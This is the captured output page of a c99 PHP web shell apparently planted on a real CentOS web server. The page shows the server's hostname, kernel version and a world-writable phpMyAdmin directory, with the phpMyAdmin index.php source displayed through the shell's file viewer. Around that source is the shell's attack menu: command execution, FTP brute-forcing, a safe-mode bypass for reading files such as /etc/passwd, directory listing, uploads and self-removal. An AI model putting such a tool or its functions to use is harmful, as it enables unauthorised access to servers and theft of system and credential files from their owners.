!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/   drwxrwxrwx
Free 51.23 GB of 127.8 GB (40.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (5.54 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* $Id: index.php,v 2.33.2.2 2006/04/20 14:14:19 nijel Exp $ */
// vim: expandtab sw=4 ts=4 sts=4:
/**
 * forms frameset
 *
 * @uses    libraries/common.lib.php        global fnctions
 * @uses    libraries/relation.lib.php      table relations
 * @uses    $GLOBALS['strNoFrames']
 * @uses    $GLOBALS['cfg']['QueryHistoryDB']
 * @uses    $GLOBALS['cfg']['Server']['user']
 * @uses    $GLOBALS['cfg']['DefaultTabServer']     as src for the mainframe
 * @uses    $GLOBALS['cfg']['DefaultTabDatabase']   as src for the mainframe
 * @uses    $GLOBALS['cfg']['LeftWidth']            for left frame width
 * @uses    $GLOBALS['collation_connection']    from $_REQUEST (grab_globals.lib.php)
 *                                              or common.lib.php
 * @uses    $GLOBALS['available_languages'] from common.lib.php (select_lang.lib.php)
 * @uses    $GLOBALS['db']
 * @uses    $GLOBALS['charset']
 * @uses    $GLOBALS['lang']
 * @uses    $GLOBALS['text_dir']
 * @uses    $_ENV['HTTP_HOST']
 * @uses    PMA_getRelationsParam()
 * @uses    PMA_purgeHistory()
 * @uses    PMA_generate_common_url()
 * @uses    PMA_VERSION
 * @uses    session_write_close()
 * @uses    time()
 * @uses    PMA_getenv()
 * @uses    header()                to send charset
 */

/**
 * Gets core libraries and defines some variables
 */
require_once('./libraries/common.lib.php');

/**
 * Includes the ThemeManager if it hasn't been included yet
 */
require_once('./libraries/relation.lib.php');

// free the session file, for the other frames to be loaded
session_write_close();

// Gets the host name
// loic1 - 2001/25/11: use the new globals arrays defined with php 4.1+
if (empty($HTTP_HOST)) {
    if (
PMA_getenv('HTTP_HOST')) {
        
$HTTP_HOST PMA_getenv('HTTP_HOST');
    } else {
        
$HTTP_HOST '';
    }
}


// purge querywindow history
$cfgRelation PMA_getRelationsParam();
if ( 
$GLOBALS['cfg']['QueryHistoryDB'] && $cfgRelation['historywork'] ) {
    
PMA_purgeHistory$GLOBALS['cfg']['Server']['user'] );
}
unset( 
$cfgRelation );


/**
 * pass variables to child pages
 */
$drops = array( 'lang''server''convcharset''collation_connection',
    
'db''table' );

foreach ( 
$drops as $each_drop ) {
    if ( ! 
array_key_exists$each_drop$_GET ) ) {
        unset( 
$_GET[$each_drop] );
    }
}
unset( 
$drops$each_drop );

if ( ! isset(
$GLOBALS['db']) || ! strlen($GLOBALS['db']) ) {
    
$main_target $GLOBALS['cfg']['DefaultTabServer'];
} elseif ( ! isset(
$GLOBALS['table']) || ! strlen($GLOBALS['table']) ) {
    
$_GET['db'] = $GLOBALS['db'];
    
$main_target $GLOBALS['cfg']['DefaultTabDatabase'];
} else {
    
$_GET['db'] = $GLOBALS['db'];
    
$_GET['table'] = $GLOBALS['table'];
    
$main_target $GLOBALS['cfg']['DefaultTabTable'];
}

$url_query PMA_generate_common_url$_GET );

if (!empty(
$GLOBALS['target']) && in_array($GLOBALS['target'], $goto_whitelist)) {
    
$main_target $GLOBALS['target'];
}

$main_target .= $url_query;

$lang_iso_code $GLOBALS['available_languages'][$GLOBALS['lang']][2];


// start output
header('Content-Type: text/html; charset=' $GLOBALS['charset']);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
    xml:lang="<?php echo $lang_iso_code?>"
    lang="<?php echo $lang_iso_code?>"
    dir="<?php echo $GLOBALS['text_dir']; ?>">
<head>
<link rel="icon" href="./favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="./favicon.ico" type="image/x-icon" />
<title>phpMyAdmin <?php echo PMA_VERSION?> -
    <?php echo htmlspecialchars($HTTP_HOST); ?></title>
<meta http-equiv="Content-Type"
    content="text/html; charset=<?php echo $GLOBALS['charset']; ?>" />
<script type="text/javascript" language="javascript">
// <![CDATA[
    // definitions used in querywindow.js
    var common_query = '<?php echo PMA_generate_common_url('''''&');?>';
    var opendb_url = '<?php echo $GLOBALS['cfg']['DefaultTabDatabase']; ?>';
    var safari_browser = <?php echo PMA_USR_BROWSER_AGENT == 'SAFARI' 'true' 'false' ?>;
    var querywindow_height = <?php echo $GLOBALS['cfg']['QueryWindowHeight']; ?>;
    var querywindow_width = <?php echo $GLOBALS['cfg']['QueryWindowWidth']; ?>;
    var collation_connection = '<?php echo $GLOBALS['collation_connection']; ?>';
    var lang = '<?php echo $GLOBALS['lang']; ?>';
    var server = '<?php echo $GLOBALS['server']; ?>';
    var table = '<?php echo $GLOBALS['table']; ?>';
    var db    = '<?php echo $GLOBALS['db']; ?>';
    var text_dir = '<?php echo $GLOBALS['text_dir']; ?>';
    var pma_absolute_uri = '<?php echo $GLOBALS['cfg']['PmaAbsoluteUri']; ?>';
// ]]>
</script>
<script src="./js/querywindow.js" type="text/javascript" language="javascript">
</script>
</head>
<frameset cols="<?php 
if ($GLOBALS['text_dir'] === 'rtl') {
    echo 
'*,';
}
echo 
$GLOBALS['cfg']['LeftWidth'];
if (
$GLOBALS['text_dir'] === 'ltr') {
    echo 
',*';
}
?>" rows="*" id="mainFrameset">
    <?php if ($GLOBALS['text_dir'] === 'ltr') { ?>
    <frame frameborder="0" id="frame_navigation"
        src="left.php<?php echo $url_query?>"
        name="frame_navigation" />
    <?php ?>
    <frame frameborder="0" id="frame_content"
        src="<?php echo $main_target?>"
        name="frame_content" />
    <?php if ($GLOBALS['text_dir'] === 'rtl') { ?>
    <frame frameborder="0" id="frame_navigation"
        src="left.php<?php echo $url_query?>"
        name="frame_navigation" />
    <?php ?>
    <noframes>
        <body>
            <p><?php echo $GLOBALS['strNoFrames']; ?></p>
        </body>
    </noframes>
</frameset>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0144 ]--